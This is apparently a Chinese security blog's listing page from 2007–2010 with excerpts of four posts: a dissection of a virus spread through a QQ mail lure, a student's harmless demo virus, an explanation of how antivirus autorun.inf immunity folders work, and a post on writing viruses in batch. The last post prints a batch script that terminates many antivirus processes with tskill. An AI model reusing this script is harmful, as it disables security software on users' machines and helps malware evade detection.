『原创』刚刚下载了一颗小病毒(fwwz.net|wx00.com),跟我一起来“解剖”吧!

刚刚QQ右下角弹出一个QQ邮箱的小纸条,标题为:20美女大学生,日夜不停求包养。如下图:

清除fwwz.net和wx00.com

这个肯定有猫腻!点进去看了下,我就知道一定是病毒了。打算把它下载下来玩玩,看我的回复:

全文阅读 »

标签: 日期: 2010年1月29日 16:04 | 分类: 黑客地带 | 评论: 9 条 | 人气: 1,266
我花一天时间写的病毒,大家可以玩一下~

  这个病毒是为了自己毕业设计时在讲台上演示而写的。因为我的毕业设计就是Nohacker V1.0—系统安全扫描及修复,所以我觉得有必要写个小小的病毒作为演示,然后用我写的安全软件进行检测并删除。因为只是做演示,所以我写的这个病毒虽然具备目前大部分病毒的特征,但并没有破坏性。

  简单讲讲这个病毒的一些特征。

  一、病毒运行后会释放出两个病毒体,如下图的“我是病毒”和“我是木马”。

我写的病毒

全文阅读 »

标签: 日期: 2009年6月02日 19:12 | 分类: 系统安全, 黑客地带 | 评论: 7 条 | 人气: 1,514
揭秘!看看这些杀毒软件的病毒免疫程序是如何免疫病毒的

  对于磁碟机病毒,一些人认为打了正版杀软的病毒免疫就可以高枕无忧了,360、江民、瑞星等杀软纷纷出了磁碟机病毒病毒免疫程序,请不要太相信杀软的病毒免疫,360、江民社区等磁碟机病毒免疫程序一个批处理就能干掉!如果病毒制作者将批处理应用于病毒,所有病毒免疫将失去意义,只是一时救急而已。

  病毒免疫程序的免疫原理:比如说autorun.inf文件,大家再熟悉不过了,但是不管给autorun.inf设置了什么属性,病毒都会更改它。一般的方法就是,在根目录下建立一个文件夹,名字就叫autorun.inf。这样一来,因为在同一目录下,同名的文件和文件夹不能共存的原理,在autorun.inf文件夹里面创建一个带.的文件夹(比如说:360safe.),使得病毒无法删除autorun.inf文件夹,病毒就无能为力,创建不了autorun.inf文件了。以后就算中毒,病毒也不会运行,从而达到了防止中毒的目的。

全文阅读 »

标签: , 日期: 2008年5月16日 9:49 | 分类: 系统安全 | 发表评论 | 人气: 2,307
批处理高级应用之编写病毒

@echo off
REM 以下批处理内容中止众多安全软件进程
tskill Mcshield.exe & tskill VsTskMgr.exe & tskillnaPrdMgr.exe & tskill UpdaterUI.exe &
tskill TBMon.exe & tskill scan32.exe & tskill Ravmond.exe & tskill CCenter.exe &
tskill RavTask.exe & tskill Rav.exe & tskill Ravmon.exe & tskill RavmonD.exe &
tskill RavStub.exe & taskill KVXP.kxp & tskill kvMonXP.kxp & tskill KVCenter.kxp &
tskill KRegEx.exe & tskill UIHost.exe & tskill TrojDie.kxp & tskill Logo_1.exe &
tskill Rundll32.exe    //tskill是结束进程的命令,&是一个组合命令,顺序执行不管前面是否失败
全文阅读 »

标签: , 日期: 2007年4月14日 13:27 | 分类: 编程乐园, 黑客地带 | 发表评论 | 人气: 4,182